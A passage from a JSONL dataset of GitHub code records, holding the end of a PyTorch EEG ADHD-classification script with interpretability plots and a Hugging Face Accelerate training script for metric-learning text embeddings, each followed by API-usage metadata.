accuracy_score(y_test, preds)\n precision = precision_score(y_test, preds)\n recall = recall_score(y_test, preds)\n f1 = f1_score(y_test, preds)\n\n print(acc)\n print(precision)\n print(recall)\n print(f1)\n print(\"val loss\",val_loss)\n print(valid_losses)\n print(specificity(y_test, preds))\n print(sensitivity(y_test, preds))\n results.append(acc)\n fpr, tpr, t = roc_curve(y_test, preds)\n cm = confusion_matrix(y_test, preds,labels=[0,1])\n print(\"conv matrix\",cm)\n #plot_roc(fpr, tpr)\n plot_cm(cm)\n\n # print training/validation statistics\n # calculate average loss over an epoch\n train_loss = np.average(train_losses)\n valid_loss = np.average(valid_losses)\n avg_train_losses.append(train_loss)\n avg_valid_losses.append(valid_loss)\n\n epoch_len = len(str(n_epoch))\n\n print_msg = (f'[{epoch:>{epoch_len}}/{n_epoch:>{epoch_len}}] ' +f'train_loss: {train_loss:.5f} ' +f'valid_loss: {valid_loss:.5f}')\n print(print_msg)\n\n # clear lists to track next epoch\n train_losses = []\n valid_losses = []\n\n # load the last checkpoint with the best model\n #my_net.load_state_dict(torch.load('checkpoint.pt'))\n\n # early_stopping needs the validation loss to check if it has decresed,\n # and if it has, it will make a checkpoint of the current model\n early_stopping(valid_loss, my_net)\n\n if early_stopping.early_stop:\n print(\"Early stopping\")\n break\n\n\n print('mean accuracy:', np.mean(results))\n\n\n\n # Save the trained model to a file\n torch.save(my_net.state_dict(), 'trained_cnn_model.pth')\n sampleVis = VisTech(my_net)\n\n # select the interpretation method to be used\n method=\"guidedbackpropogation\"\n # method=\"Saliencymap\"\n ########################################\n\n sampleidx = 8\n sampleVis.generate_interpretation(batchInput=x_test, sampleidx=sampleidx, subid=i,\n samplelabel=y_test[sampleidx], likelihood=probs[sampleidx], method=method)\n\n\ntorch.cuda.empty_cache()\n\n\n\nif __name__ == '__main__':\n run()\n", "repo_name": "ahmedguebsi/XAI_ADHD_Detection", "sub_path": "adhd_deep/xai_all.py", "file_name": "xai_all.py", "file_ext": "py", "file_size_in_byte": 27274, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.empty_cache", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.nn.ELU", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.nn.ELU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.div", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 384, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 389, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 408, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 408, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 409, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 409, "usage_type": "name"}, {"api_name": "numpy.percentile", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 430, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 431, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Normalize", "line_number": 432, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 432, "usage_type": "name"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 438, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.sca", "line_number": 451, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 451, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "mne.create_info", "line_number": 457, "usage_type": "call"}, {"api_name": "electrodes_positions.get_electrodes_coordinates", "line_number": 466, "usage_type": "call"}, {"api_name": "electrodes_positions.get_electrodes_positions", "line_number": 468, "usage_type": "call"}, {"api_name": "electrodes_positions.set_electrodes_montage", "line_number": 469, "usage_type": "call"}, {"api_name": "mne.viz.plot_topomap", "line_number": 471, "usage_type": "call"}, {"api_name": "mne.viz", "line_number": 471, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 474, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 474, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 477, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 477, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 478, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 478, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 479, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 479, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 480, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 480, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 481, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 482, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 482, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 484, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 484, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 484, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 485, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 485, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 486, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 486, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 487, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 487, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 488, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 488, "usage_type": "name"}, {"api_name": "adhd_classification.data_load", "line_number": 513, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 514, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 515, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 530, "usage_type": "call"}, {"api_name": "numpy.longlong", "line_number": 530, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 538, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 544, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 550, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 555, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 555, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 555, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 556, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 556, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 565, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 565, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 566, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 566, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 568, "usage_type": "call"}, {"api_name": "early_stopping.EarlyStopping", "line_number": 595, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 627, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 629, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 632, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 638, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 643, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 644, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 645, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 646, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 657, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 658, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 665, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 666, "usage_type": "call"}, {"api_name": "early_stopping.early_stop", "line_number": 686, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 691, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 696, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 709, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 709, "usage_type": "attribute"}]}
+{"seq_id": "22511070015", "text": "import logging\nimport math\nimport os\nimport random\nimport shutil\n\nimport datasets\nfrom datasets import load_dataset\nimport numpy as np\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom tqdm.auto import tqdm\n\nimport transformers\nfrom accelerate import Accelerator\nfrom transformers import (\n AdamW,\n AutoTokenizer,\n DataCollatorWithPadding,\n default_data_collator,\n get_scheduler,\n set_seed,\n)\n\nimport modules.args as args\nfrom modules.models import (\n BertCls,\n BertClsSoftmaxCrossEntropyLoss,\n BertClsArcFaceLoss,\n TripletMarginLoss,\n MultiSimilarityLoss,\n NTXentLoss,\n)\nfrom modules.utils import AccuracyCalculator\nfrom modules.samplers import (\n MPerClassSampler, \n MPerClassSamplerWithoutEasyPostives\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef choose_loss(args, num_labels):\n if args.loss_type == \"softmax\":\n model = BertClsSoftmaxCrossEntropyLoss(\n model_name_or_path=args.model_name_or_path,\n num_labels=num_labels,\n )\n return model, None\n elif args.loss_type == \"arcface\":\n model = BertClsArcFaceLoss(\n model_name_or_path=args.model_name_or_path,\n num_labels=num_labels,\n margin=args.margin,\n scale=args.scale\n )\n return model, None\n elif args.loss_type == \"triplet\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = TripletMarginLoss(\n margin=args.margin,\n triplets_per_anchor=\"all\"\n )\n return bert_model, loss_model\n elif args.loss_type == \"ms\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = MultiSimilarityLoss(\n alpha=args.alpha,\n beta=args.beta,\n base=args.base\n )\n return bert_model, loss_model\n elif args.loss_type == \"ntxent\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = NTXentLoss(\n temperature=args.temperature\n )\n return bert_model, loss_model\n else:\n logging.error(\"choose one loss model\")\n exit(1)\n\n\ndef main(args):\n # Initialize the accelerator. We will let the accelerator handle device placement for us in this example.\n accelerator = Accelerator()\n # Make one log on every process with the configuration for debugging.\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO,\n )\n logger.info(accelerator.state)\n\n # Setup logging, we only want one process per machine to log things on the screen.\n # accelerator.is_local_main_process is only True for one process per machine.\n logger.setLevel(logging.INFO if accelerator.is_local_main_process else logging.ERROR)\n if accelerator.is_local_main_process:\n datasets.utils.logging.set_verbosity_warning()\n transformers.utils.logging.set_verbosity_info()\n else:\n datasets.utils.logging.set_verbosity_error()\n transformers.utils.logging.set_verbosity_error()\n\n # If passed along, set the training seed now.\n if args.seed is not None:\n set_seed(args.seed)\n\n # Handle the repository creation\n if accelerator.is_main_process:\n if args.output_dir is not None:\n os.makedirs(args.output_dir)\n accelerator.wait_for_everyone()\n\n # Loading the dataset from local csv or json file.\n data_files = {}\n if args.train_file is not None:\n data_files[\"train\"] = args.train_file\n if args.validation_file is not None:\n data_files[\"validation\"] = args.validation_file\n\n raw_datasets = load_dataset('json', data_files=data_files)\n\n # A useful fast method:\n # https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique\n if args.label_num is not None:\n label_list = [f\"{i:02}\" for i in range(1, args.label_num+1)]\n else:\n label_list = raw_datasets[\"train\"].unique(\"label\") + raw_datasets[\"validation\"].unique(\"label\")\n label_list = list(set(label_list))\n label_list.sort() # Let's sort it for determinism\n num_labels = len(label_list)\n\n ngram_list = raw_datasets[\"train\"].unique(\"ngram\") + raw_datasets[\"validation\"].unique(\"ngram\")\n\n # Load pretrained model and tokenizer\n #\n # In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently\n # download model & vocab.\n tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path, use_fast=not args.use_slow_tokenizer)\n\n sentence_key = \"text\"\n\n label_to_id = {v: i for i, v in enumerate(label_list)}\n ngram_to_id = {v: i for i, v in enumerate(ngram_list)}\n\n padding = \"max_length\" if args.pad_to_max_length else False\n\n def preprocess_function(examples):\n # Tokenize the texts\n texts = (\n (examples[sentence_key],)\n )\n result = tokenizer(*texts, padding=padding, max_length=args.max_length, truncation=True)\n\n if \"label\" in examples:\n if label_to_id is not None:\n # Map labels to IDs (not necessary for GLUE tasks)\n result[\"labels\"] = [label_to_id[l] for l in examples[\"label\"]]\n else:\n # In all cases, rename the column to labels because the model will expect that.\n result[\"labels\"] = examples[\"label\"]\n\n result[\"ngram_ids\"] = [ngram_to_id[l] for l in examples[\"ngram\"]]\n return result\n\n with accelerator.main_process_first():\n processed_datasets = raw_datasets.map(\n preprocess_function,\n batched=True,\n remove_columns=raw_datasets[\"train\"].column_names,\n desc=\"Running tokenizer on dataset\",\n )\n\n train_dataset = processed_datasets[\"train\"]\n eval_dataset = processed_datasets[\"validation\"]\n\n # Log a few random samples from the training set:\n for index in random.sample(range(len(train_dataset)), 3):\n logger.info(f\"Sample {index} of the training set: {train_dataset[index]}.\")\n\n # DataLoaders creation:\n if args.pad_to_max_length:\n # If padding was already done ot max length, we use the default data collator that will just convert everything\n # to tensors.\n data_collator = default_data_collator\n else:\n # Otherwise, `DataCollatorWithPadding` will apply dynamic padding for us (by padding to the maximum length of\n # the samples passed). When using mixed precision, we add `pad_to_multiple_of=8` to pad all tensors to multiple\n # of 8s, which will enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta).\n data_collator = DataCollatorWithPadding(tokenizer, pad_to_multiple_of=(8 if accelerator.use_fp16 else None))\n\n # Classification loss or embedding loss\n if args.loss_type in [\"softmax\", \"arcface\"]:\n model, _ = choose_loss(args, num_labels)\n else:\n model, loss_model = choose_loss(args, num_labels)\n\n\n train_sampler = None\n eval_sampler = None\n if args.m_per_class_sampler:\n train_sampler = MPerClassSampler(\n train_dataset[\"labels\"], \n args.sample_per_class_in_train_batch,\n batch_size=args.per_device_train_batch_size,\n length_before_new_iter=len(train_dataset[\"labels\"])\n )\n eval_sampler = MPerClassSampler(\n eval_dataset[\"labels\"], \n args.sample_per_class_in_eval_batch,\n batch_size=args.per_device_eval_batch_size,\n length_before_new_iter=len(eval_dataset[\"labels\"])\n )\n if args.m_per_class_sampler_without_easy_positives:\n train_sampler = MPerClassSamplerWithoutEasyPostives(\n train_dataset[\"labels\"],\n train_dataset[\"ngram_ids\"], \n args.sample_per_class_in_train_batch,\n batch_size=args.per_device_train_batch_size,\n length_before_new_iter=len(train_dataset[\"labels\"])\n )\n eval_sampler = MPerClassSamplerWithoutEasyPostives(\n eval_dataset[\"labels\"],\n eval_dataset[\"ngram_ids\"],\n args.sample_per_class_in_eval_batch,\n batch_size=args.per_device_eval_batch_size,\n length_before_new_iter=len(eval_dataset[\"labels\"])\n )\n train_dataloader = DataLoader(\n train_dataset, \n shuffle=(train_sampler is None),\n sampler=train_sampler, \n collate_fn=data_collator, \n batch_size=args.per_device_train_batch_size,\n drop_last=True\n )\n eval_dataloader = DataLoader(\n eval_dataset, \n shuffle=(eval_sampler is None),\n sampler=eval_sampler, \n collate_fn=data_collator, \n batch_size=args.per_device_eval_batch_size,\n drop_last=True\n )\n\n # Optimizer\n # Split weights in two groups, one with weight decay and the other not.\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay,\n },\n {\n \"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n ]\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate)\n\n # Prepare everything with our `accelerator`.\n model, optimizer, train_dataloader, eval_dataloader = accelerator.prepare(\n model, optimizer, train_dataloader, eval_dataloader\n )\n\n # Note -> the training dataloader needs to be prepared before we grab his length below (cause its length will be\n # shorter in multiprocess)\n\n # Scheduler and math around the number of training steps.\n num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)\n\n args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch\n\n lr_scheduler = get_scheduler(\n name=args.lr_scheduler_type,\n optimizer=optimizer,\n num_warmup_steps=args.num_warmup_steps,\n num_training_steps=args.max_train_steps,\n )\n\n accuracy_calculator = AccuracyCalculator(k=\"max_bin_count\", include=(\"precision_at_1\", \"r_precision\", \"mean_average_precision_at_r\"))\n\n # Train!\n total_batch_size = args.per_device_train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps\n\n logger.info(\"***** Running training *****\")\n logger.info(f\" Num examples = {len(train_dataset)}\")\n logger.info(f\" Num Epochs = {args.num_train_epochs}\")\n logger.info(f\" Instantaneous batch size per device = {args.per_device_train_batch_size}\")\n logger.info(f\" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}\")\n logger.info(f\" Gradient Accumulation steps = {args.gradient_accumulation_steps}\")\n logger.info(f\" Total optimization steps = {args.max_train_steps}\")\n\n\n model.eval()\n\n embeddings = []\n labels = []\n\n for step, batch in enumerate(tqdm(eval_dataloader)):\n if step < 5:\n logger.info(f\"[labels in eval batch {step}]\")\n logger.info(batch[\"labels\"])\n logger.info(f\"[ngram_ids in eval batch {step}]\")\n logger.info(batch[\"ngram_ids\"])\n\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n results_txt = \"\"\n current_record = 0\n current_record_epoch_or_step = -1\n logger.info(f\"epoch -1 (before training): {eval_metric}\")\n results_txt += f\"epoch -1 (before training): {eval_metric}\\n\"\n\n\n progress_bar = tqdm(range(args.max_train_steps), disable=not accelerator.is_local_main_process)\n completed_steps = 0\n\n for epoch in range(args.num_train_epochs):\n model.train()\n\n for step, batch in enumerate(train_dataloader):\n if epoch == 0 and step < 5:\n logger.info(f\"[labels in train batch {step}]\")\n logger.info(batch[\"labels\"])\n logger.info(f\"[ngram_ids in train batch {step}]\")\n logger.info(batch[\"ngram_ids\"])\n\n batch.pop(\"ngram_ids\")\n\n if args.loss_type in [\"softmax\", \"arcface\"]:\n outputs = model(**batch)\n loss = outputs.loss\n\n else:\n outputs = model(**batch)\n embeddings_in_batch = outputs.embeddings\n labels_in_batch = batch[\"labels\"]\n\n loss = loss_model(embeddings_in_batch, labels_in_batch)\n\n loss = loss / args.gradient_accumulation_steps\n accelerator.backward(loss)\n\n if step % args.gradient_accumulation_steps == 0 or step == len(train_dataloader) - 1:\n optimizer.step()\n lr_scheduler.step()\n optimizer.zero_grad()\n progress_bar.update(1)\n completed_steps += 1\n\n if completed_steps >= args.max_train_steps:\n break\n\n \n if args.eval_steps is not None and completed_steps % args.eval_steps == 0:\n embeddings = []\n labels = []\n\n model.eval()\n for step, batch in enumerate(eval_dataloader):\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n\n logger.info(f\"step {completed_steps}: {eval_metric}\")\n results_txt += f\"step {completed_steps}: {eval_metric}\\n\"\n\n # save model if it achieves new record\n if eval_metric[\"mean_average_precision_at_r\"] > current_record:\n accelerator.wait_for_everyone()\n unwrapped_model = accelerator.unwrap_model(model)\n accelerator.save(unwrapped_model.state_dict(), os.path.join(args.output_dir, f\"pytorch_model_step{completed_steps}.bin\"))\n current_record = eval_metric[\"mean_average_precision_at_r\"]\n current_record_epoch_or_step = completed_steps\n\n\n if args.eval_steps is not None:\n continue\n\n embeddings = []\n labels = []\n\n model.eval()\n for step, batch in enumerate(eval_dataloader):\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n\n logger.info(f\"epoch {epoch}: {eval_metric}\")\n results_txt += f\"epoch {epoch}: {eval_metric}\\n\"\n\n # save model if it achieves new record\n if eval_metric[\"mean_average_precision_at_r\"] > current_record:\n accelerator.wait_for_everyone()\n unwrapped_model = accelerator.unwrap_model(model)\n accelerator.save(unwrapped_model.state_dict(), os.path.join(args.output_dir, f\"pytorch_model_epoch{epoch}.bin\"))\n current_record = eval_metric[\"mean_average_precision_at_r\"]\n current_record_epoch_or_step = epoch\n\n\n if args.output_dir is not None:\n if args.eval_steps is not None:\n shutil.copyfile(\n os.path.join(args.output_dir, f\"pytorch_model_step{current_record_epoch_or_step}.bin\"), \n os.path.join(args.output_dir, f\"pytorch_model.bin\")\n )\n results_txt += f\"best step: {current_record_epoch_or_step}\\n\"\n\n # delete temporary models\n for step in range(args.max_train_steps):\n target_file = os.path.join(args.output_dir, f\"pytorch_model_step{step}.bin\")\n if os.path.isfile(target_file):\n os.remove(target_file)\n\n else:\n shutil.copyfile(\n os.path.join(args.output_dir, f\"pytorch_model_epoch{current_record_epoch_or_step}.bin\"), \n os.path.join(args.output_dir, f\"pytorch_model.bin\")\n )\n results_txt += f\"best epoch: {current_record_epoch_or_step}\\n\"\n\n # delete temporary models\n for epoch in range(args.num_train_epochs):\n target_file = os.path.join(args.output_dir, f\"pytorch_model_epoch{epoch}.bin\")\n if os.path.isfile(target_file):\n os.remove(target_file)\n\n if accelerator.is_main_process:\n unwrapped_model.config.save_pretrained(args.output_dir)\n tokenizer.save_pretrained(args.output_dir)\n\n with open(os.path.join(args.output_dir, \"results.txt\"), \"w\", encoding=\"utf-8\") as f:\n f.write(results_txt)\n\n\nif __name__ == \"__main__\":\n args = args.parse_args()\n main(args)", "repo_name": "kaisugi/rhetorical_aspect_embeddings", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 18516, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "modules.args.loss_type", "line_number": 44, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 44, "usage_type": "name"}, {"api_name": "modules.models.BertClsSoftmaxCrossEntropyLoss", "line_number": 45, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 46, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 50, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 50, "usage_type": "name"}, {"api_name": "modules.models.BertClsArcFaceLoss", "line_number": 51, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 52, "usage_type": "name"}, {"api_name": "modules.args.margin", 